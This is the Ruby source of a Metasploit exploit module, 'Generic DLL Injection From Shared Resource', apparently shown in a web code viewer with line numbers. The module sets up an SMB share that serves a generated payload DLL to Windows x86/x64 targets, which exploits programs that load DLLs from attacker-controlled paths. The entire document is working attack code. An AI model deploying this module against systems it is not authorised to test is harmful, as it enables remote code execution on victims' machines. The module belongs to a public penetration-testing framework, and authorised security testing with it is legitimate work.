Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ManualRanking
8

9
  include Msf::Exploit::Remote::SMB::Server::Share
10
  include Msf::Exploit::EXE
11

12
  def initialize(info={})
13
    super(update_info(info,
14
      'Name'          => 'Generic DLL Injection From Shared Resource',
15
      'Description'   => %q{
16
        This is a general-purpose module for exploiting conditions where a DLL can be loaded
17
        from a specified SMB share. This module serves payloads as DLLs over an SMB service.
18
      },
19
      'Author'      =>
20
        [
21
          'Matthew Hall <hallm[at]sec-1.com>'
22
        ],
23
      'References'     =>
24
        [
25
          ['CWE', '114']
26
        ],
27
      'DefaultOptions' =>
28
        {
29
          'EXITFUNC' => 'thread',
30
        },
31
      'Privileged'     => false,
32
      'Platform'       => 'win',
33
      'Arch'           => [ARCH_X86, ARCH_X64],
34
      'Payload'        =>
35
        {
36
          'Space'       => 2048,
37
          'DisableNops' => true
38
        },
39
      'Targets'        =>
40
        [
41
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
42
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
43
        ],
44
      'DefaultTarget'  => 0,
45
      'DisclosureDate' => '2015-03-04'
46
    ))
47

48
    register_options(
49
      [
50
        OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
51
      ])
52

53
    deregister_options('FILE_CONTENTS')
54
  end
55

56
  def setup
57
    super
58

59
    self.file_contents = generate_payload_dll
60
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
61
    print_status("File available on #{unc}...")
62
  end
63
end
64

65